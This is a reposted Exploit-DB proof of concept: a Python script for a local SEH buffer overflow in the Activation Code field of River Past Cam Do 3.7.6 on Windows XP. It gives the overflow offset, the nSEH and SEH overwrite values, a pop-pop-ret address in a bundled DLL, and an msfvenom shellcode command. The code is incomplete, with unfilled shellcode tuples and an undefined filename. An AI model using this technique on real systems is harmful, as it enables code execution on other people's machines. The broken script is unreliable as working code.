River Past Cam Do 3.7.6 – ‘Activation Code’ Local Buffer Overflow

  • 作者: Chris Au
    日期: 2019-04-08
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/46670/
  • #!/usr/bin/python -w
    # Exploit Author: Chris Au
    # Exploit Title:River Past Cam Do 3.7.6 Local Buffer Overflow in Activation Code
    # Date: 07-04-2019
    # Vulnerable Software: River Past Cam Do 3.7.6
    # Vendor Homepage: http://www.flexhex.com
    # Version: 3.7.6
    # Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
    # Tested Windows Windows XP SP3 EN
    # PoC
    # 1. generate evil.txt, copy contents to clipboard
    # 2. open Cam Do
    # 3. the application will ask you to input the activation code in order to activate it
    # 4. paste contents from clipboard in the "Activation code"
    # 5. select Activate
    # 6. calc.exe
    junk = "A" * 608
    nseh = "\xeb\x09\x90\x90"
    seh = "\x0e\x7d\x01\x10" ##pop pop ret rvddshow2.dll	
    jmp = (
    #msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0e\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb8\xbc\xbd\xbe" BufferRegister=EAX -f c
    shellcode = (
    buffer = junk + nseh + seh + jmp + shellcode
    buffer += "C" * (5000-len(buffer))
    textfile = open(filename , 'w')